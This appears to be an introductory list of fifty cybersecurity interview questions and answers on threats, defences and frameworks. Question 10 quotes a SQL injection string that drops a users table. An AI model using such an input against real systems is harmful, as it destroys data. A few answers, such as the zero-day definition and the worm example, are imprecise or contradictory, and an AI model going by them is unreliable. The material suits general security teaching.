1. What is Cyber Security?
Answer:
Cyber Security is the practice of protecting computer systems, networks, and data from cyberattacks, unauthorized access, or damage. It involves various techniques like encryption, firewalls and secure protocols to safeguard sensitive information.
For example, using HTTPS instead of HTTP secures the communication between a user and a website.
2. What are the main types of Cyber Threats?
Answer:
Cyber threats include:
- Malware: Malicious software like viruses, worms, or ransomware.
- Phishing: Fraudulent emails to steal personal information.
- DDoS (Distributed Denial of Service): Overwhelms a server with traffic to crash it.
- Man-in-the-Middle Attack: Eavesdropping on communication between two parties.
3. What is the CIA Triad in Cyber Security?
Answer:
The CIA Triad stands for:
- Confidentiality: Ensuring that data is accessed only by authorized individuals.
- Integrity: Protecting data from unauthorized modifications.
- Availability: Ensuring resources are accessible when needed.
Example: Encrypting sensitive files ensures confidentiality.
4. What is a Firewall?
Answer:
A firewall is a network security device or software that monitors and controls incoming and outgoing network traffic based on predefined security rules.
Example: A firewall can block unauthorized access to a company’s internal network while allowing employees to browse the internet safely.
5. What is Phishing?
Answer:
Phishing is a social engineering attack where attackers send deceptive emails or messages to trick users into revealing sensitive information like passwords or credit card details.
Example: Receiving an email pretending to be from your bank asking you to verify your account.
6. What is Ransomware?
Answer:
Ransomware is a type of malware that encrypts a victim’s files, making them inaccessible until a ransom is paid to the attacker.
Example: WannaCry, a ransomware attack in 2017, affected thousands of systems worldwide.
7. What is Two-Factor Authentication (2FA)?
Answer:
Two-Factor Authentication adds an extra layer of security by requiring two forms of verification: something you know (password) and something you have (a one-time code or biometric).
Example: Logging into a Gmail account with a password and a code sent to your phone.
8. What is a VPN?
Answer:
A VPN (Virtual Private Network) creates a secure, encrypted tunnel between your device and the internet, masking your IP address and protecting your online activities from prying eyes.
Example: Using a VPN while accessing public Wi-Fi ensures data security.
9. What is Ethical Hacking?
Answer:
Ethical hacking involves legally breaking into computers and devices to test an organization’s defenses. Ethical hackers help identify vulnerabilities before malicious hackers exploit them.
Example: Penetration testing performed by certified ethical hackers.
10. What is SQL Injection?
Answer:
SQL Injection is a web application attack where malicious SQL code is inserted into a query to manipulate the database.
Example: Entering ‘; DROP TABLE users;– in a login form can delete a database table if the input is not sanitized.
11. What is Social Engineering?
Answer:
Social engineering exploits human psychology to manipulate individuals into revealing confidential information.
Example: A fake tech support call tricking someone into sharing their system password.
12. What is a Zero-Day Exploit?
Answer:
A Zero-Day Exploit is a cyberattack that occurs on the same day a vulnerability is discovered, leaving no time for a fix or patch.
Example: Exploiting an unpatched software flaw before the vendor releases an update.
13. What are Botnets?
Answer:
Botnets are networks of compromised devices controlled by attackers to perform coordinated tasks like sending spam or launching DDoS attacks.
Example: Mirai Botnet, which targeted IoT devices to conduct DDoS attacks.
14. What is Encryption?
Answer:
Encryption is the process of converting plaintext into ciphertext using algorithms, making it unreadable without a decryption key.
Example: AES (Advanced Encryption Standard) is commonly used to secure sensitive data.
15. What is a Denial of Service (DoS) Attack?
Answer:
A DoS attack floods a server or network with excessive requests, making it unavailable to legitimate users.
Example: An attacker sending millions of requests to crash an e-commerce site during a sale.
16. What is a Vulnerability?
Answer:
A vulnerability is a weakness in a system or application that can be exploited by attackers.
Example: Using outdated software with known security flaws.
17. What are Security Patches?
Answer:
Security patches are updates released by software vendors to fix vulnerabilities and improve security.
Example: Installing Windows updates to protect against newly discovered threats.
18. What is a Honeypot in Cyber Security?
Answer:
A honeypot is a decoy system designed to attract attackers and study their methods without risking the actual network.
Example: Setting up a fake login portal to observe brute force attacks.
19. What is the Difference Between IDS and IPS?
Answer:
- IDS (Intrusion Detection System): Monitors network traffic for suspicious activity and raises alerts.
- IPS (Intrusion Prevention System): Blocks malicious traffic in real-time.
20. What is SSL/TLS?
Answer:
SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are protocols that encrypt data transmitted over the internet, ensuring secure communication.
Example: Websites with HTTPS use SSL/TLS.
21. What is Brute Force Attack?
Answer:
A brute force attack attempts to guess passwords or encryption keys by systematically trying all possible combinations.
Example: Repeatedly trying different passwords to access an account.
22. What is Cross-Site Scripting (XSS)?
Answer:
XSS is an attack where malicious scripts are injected into trusted websites. These scripts execute in the user’s browser and steal data.
Example: Injecting a script into a comment box to steal cookies.
23. What is a Security Token?
Answer:
A security token is a hardware or software-based device that generates a unique code to verify user identity.
Example: Google Authenticator generates time-based codes.
24. What is Digital Forensics?
Answer:
Digital forensics involves investigating and recovering data from digital devices to analyze cybercrimes.
Example: Recovering deleted files from a hard drive as evidence.
25. What is a Cybersecurity Risk Assessment?
Answer:
A cybersecurity risk assessment identifies potential threats and vulnerabilities to prioritize mitigation efforts.
Example: Analyzing firewall logs to detect weaknesses in network defenses.
26. What is a Trojan Horse?
Answer:
A Trojan Horse is a type of malware disguised as legitimate software to trick users into installing it. Once installed, it can perform malicious actions like stealing data or installing additional malware.
Example: A fake antivirus software that prompts users to “remove viruses” but actually infects the system.
27. What is the Difference Between Black Hat, White Hat and Grey Hat Hackers?
Answer:
- Black Hat Hackers: Malicious hackers who exploit vulnerabilities for personal or financial gain.
- White Hat Hackers: Ethical hackers who identify and fix vulnerabilities legally.
- Grey Hat Hackers: Operate between ethical and unethical practices, often without malicious intent but without permission.
28. What is Penetration Testing?
Answer:
Penetration testing (pen testing) is a simulated cyberattack performed to evaluate the security of a system. It identifies vulnerabilities before real attackers can exploit them.
Example: A company hiring ethical hackers to test its web application for flaws.
29. What is a Rootkit?
Answer:
A rootkit is a collection of tools that enable unauthorized access to a computer system while hiding its presence. It often allows attackers to execute commands or steal data without detection.
Example: A rootkit that disables antivirus software to avoid removal.
30. What is Data Breach?
Answer:
A data breach occurs when sensitive information is accessed, stolen, or leaked by unauthorized entities.
Example: The Facebook data breach in 2019 exposed millions of users’ personal data.
31. What is a Man-in-the-Middle (MITM) Attack?
Answer:
In a MITM attack, a malicious actor intercepts and alters communication between two parties without their knowledge.
Example: An attacker intercepting login credentials on public Wi-Fi.
32. What is Malware Analysis?
Answer:
Malware analysis is the process of studying malware to understand its behavior, origin, and impact. This helps in developing countermeasures.
Example: Reverse-engineering ransomware to create a decryption tool.
33. What are the Different Types of Encryption?
Answer:
- Symmetric Encryption: Uses the same key for encryption and decryption. Example: AES.
- Asymmetric Encryption: Uses a pair of keys (public and private). Example: RSA.
34. What is a Security Audit?
Answer:
A security audit is a comprehensive assessment of an organization’s security policies, procedures, and controls to ensure compliance and identify weaknesses.
Example: Regularly checking access logs and software updates.
35. What is Cyber Espionage?
Answer:
Cyber espionage involves unauthorized access to sensitive or classified information for political or financial gain.
Example: Hackers stealing defense secrets from a government database.
36. What are Cookies and How Can They Be Misused?
Answer:
Cookies are small files stored on a user’s device by websites to track sessions and preferences. Malicious actors can exploit cookies to hijack user sessions.
Example: Stealing session cookies via XSS to access user accounts.
37. What is an Insider Threat?
Answer:
An insider threat arises when an employee, contractor, or business partner exploits access to harm the organization.
Example: A disgruntled employee leaking confidential data.
38. What is Cybersecurity Awareness Training?
Answer:
This training educates employees about recognizing cyber threats and adhering to security best practices to reduce risks.
Example: Teaching staff to identify phishing emails.
39. What is the Role of DNS in Cyber Security?
Answer:
DNS translates domain names into IP addresses. Cybersecurity tools use DNS to block malicious websites by filtering traffic.
Example: DNS filtering to prevent users from visiting phishing sites.
40. What is Social Media Phishing?
Answer:
Social media phishing uses fake accounts or messages to steal information by pretending to be a trusted entity.
Example: A fake Facebook message asking users to reset their passwords.
41. What is Patch Management?
Answer:
Patch management involves regularly updating software to fix vulnerabilities and improve security.
Example: Installing the latest version of a browser to prevent exploitation of older bugs.
42. What is a Security Incident?
Answer:
A security incident is any event that compromises the confidentiality, integrity, or availability of information.
Example: Unauthorized access to a server.
43. What is BYOD Security?
Answer:
BYOD (Bring Your Own Device) security refers to protecting organizational data accessed on employees’ personal devices.
Example: Implementing mobile device management (MDM) policies.
44. What is the Difference Between Worms and Viruses?
Answer:
- Worms: Self-replicating malware that spreads without user interaction.
- Viruses: Require a host file and user interaction to spread.
Example: A worm spreads via email attachments, while a virus infects a file.
45. What is Cybersecurity Insurance?
Answer:
Cybersecurity insurance covers financial losses caused by cyberattacks, including data breaches and ransomware.
Example: A company recovering costs after a ransomware attack.
46. What is Keylogging?
Answer:
Keylogging is a technique where a program records keystrokes to steal sensitive information like passwords.
Example: A keylogger capturing a user’s bank login credentials.
47. What is a Logic Bomb?
Answer:
A logic bomb is malicious code triggered by specific conditions, like a date or user action.
Example: A program deleting files if the user doesn’t pay within a week.
48. What is Multi-Factor Authentication (MFA)?
Answer:
MFA requires multiple verification steps, such as a password, a security token, or biometrics, to authenticate a user.
Example: Logging into an account using a password and fingerprint scan.
49. What is Cybersecurity Framework?
Answer:
A cybersecurity framework provides guidelines to manage and reduce risks. Popular frameworks include NIST and ISO 27001.
Example: Implementing NIST guidelines to secure a company’s infrastructure.
50. What is Cybersecurity Governance?
Answer:
Cybersecurity governance ensures an organization aligns its security strategies with business objectives through policies and procedures.
Example: Creating a data privacy policy to comply with GDPR.